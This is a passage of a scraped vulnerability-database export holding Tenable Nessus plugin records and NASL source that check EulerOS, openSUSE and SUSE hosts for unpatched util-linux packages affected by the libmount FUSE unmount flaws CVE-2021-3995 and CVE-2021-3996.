have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1461\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42c1b145\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:26:44", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-05T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : libeconf, shadow and util-linux (openSUSE-SU-2022:0727-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libblkid-devel", "p-cpe:/a:novell:opensuse:libblkid-devel-32bit", "p-cpe:/a:novell:opensuse:libblkid-devel-static", "p-cpe:/a:novell:opensuse:libblkid1", "p-cpe:/a:novell:opensuse:libblkid1-32bit", "p-cpe:/a:novell:opensuse:libeconf-devel", "p-cpe:/a:novell:opensuse:libeconf0", "p-cpe:/a:novell:opensuse:libeconf0-32bit", "p-cpe:/a:novell:opensuse:libfdisk-devel", "p-cpe:/a:novell:opensuse:libfdisk-devel-32bit", "p-cpe:/a:novell:opensuse:libfdisk-devel-static", "p-cpe:/a:novell:opensuse:libfdisk1", "p-cpe:/a:novell:opensuse:libfdisk1-32bit", "p-cpe:/a:novell:opensuse:libmount-devel", "p-cpe:/a:novell:opensuse:libmount-devel-32bit", "p-cpe:/a:novell:opensuse:libmount-devel-static", "p-cpe:/a:novell:opensuse:libmount1", "p-cpe:/a:novell:opensuse:libmount1-32bit", "p-cpe:/a:novell:opensuse:libsmartcols-devel", "p-cpe:/a:novell:opensuse:libsmartcols-devel-32bit", "p-cpe:/a:novell:opensuse:libsmartcols-devel-static", "p-cpe:/a:novell:opensuse:libsmartcols1", "p-cpe:/a:novell:opensuse:libsmartcols1-32bit", "p-cpe:/a:novell:opensuse:libuuid-devel", "p-cpe:/a:novell:opensuse:libuuid-devel-32bit", "p-cpe:/a:novell:opensuse:libuuid-devel-static", "p-cpe:/a:novell:opensuse:libuuid1", "p-cpe:/a:novell:opensuse:libuuid1-32bit", "p-cpe:/a:novell:opensuse:login_defs", "p-cpe:/a:novell:opensuse:python3-libmount", "p-cpe:/a:novell:opensuse:shadow", "p-cpe:/a:novell:opensuse:util-linux", "p-cpe:/a:novell:opensuse:util-linux-lang", "p-cpe:/a:novell:opensuse:util-linux-systemd", "p-cpe:/a:novell:opensuse:uuidd", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-0727-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158640", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:0727-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158640);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"openSUSE 15 Security Update : libeconf, shadow and util-linux (openSUSE-SU-2022:0727-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1188507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1194976\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/GUBUSLRBG42MLRL65HHMLIWQIKS3SKKP/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?630d9106\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3996\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:login_defs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux-systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf-devel-0.4.4+git20220104.962774f-150300.3.6.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf0-32bit-0.4.4+git20220104.962774f-150300.3.6.2', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libblkid-devel / libblkid-devel-32bit / libblkid-devel-static / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T14:59:08", "description": "The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-05T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : libeconf, shadow and util-linux (SUSE-SU-2022:0727-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-07-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libblkid-devel", "p-cpe:/a:novell:suse_linux:libblkid-devel-static", "p-cpe:/a:novell:suse_linux:libblkid1", "p-cpe:/a:novell:suse_linux:libblkid1-32bit", "p-cpe:/a:novell:suse_linux:libeconf0", "p-cpe:/a:novell:suse_linux:libfdisk-devel", "p-cpe:/a:novell:suse_linux:libfdisk1", "p-cpe:/a:novell:suse_linux:libmount-devel", "p-cpe:/a:novell:suse_linux:libmount1", "p-cpe:/a:novell:suse_linux:libmount1-32bit", "p-cpe:/a:novell:suse_linux:libsmartcols-devel", "p-cpe:/a:novell:suse_linux:libsmartcols1", "p-cpe:/a:novell:suse_linux:libuuid-devel", "p-cpe:/a:novell:suse_linux:libuuid-devel-static", "p-cpe:/a:novell:suse_linux:libuuid1", "p-cpe:/a:novell:suse_linux:libuuid1-32bit", "p-cpe:/a:novell:suse_linux:login_defs", "p-cpe:/a:novell:suse_linux:shadow", "p-cpe:/a:novell:suse_linux:util-linux", "p-cpe:/a:novell:suse_linux:util-linux-lang", "p-cpe:/a:novell:suse_linux:util-linux-systemd", "p-cpe:/a:novell:suse_linux:uuidd", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-0727-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158608", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:0727-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158608);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0727-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libeconf, shadow and util-linux (SUSE-SU-2022:0727-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by\nmultiple vulnerabilities as referenced in the SUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1188507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1194976\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3996\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-March/010364.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16caa759\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libeconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", 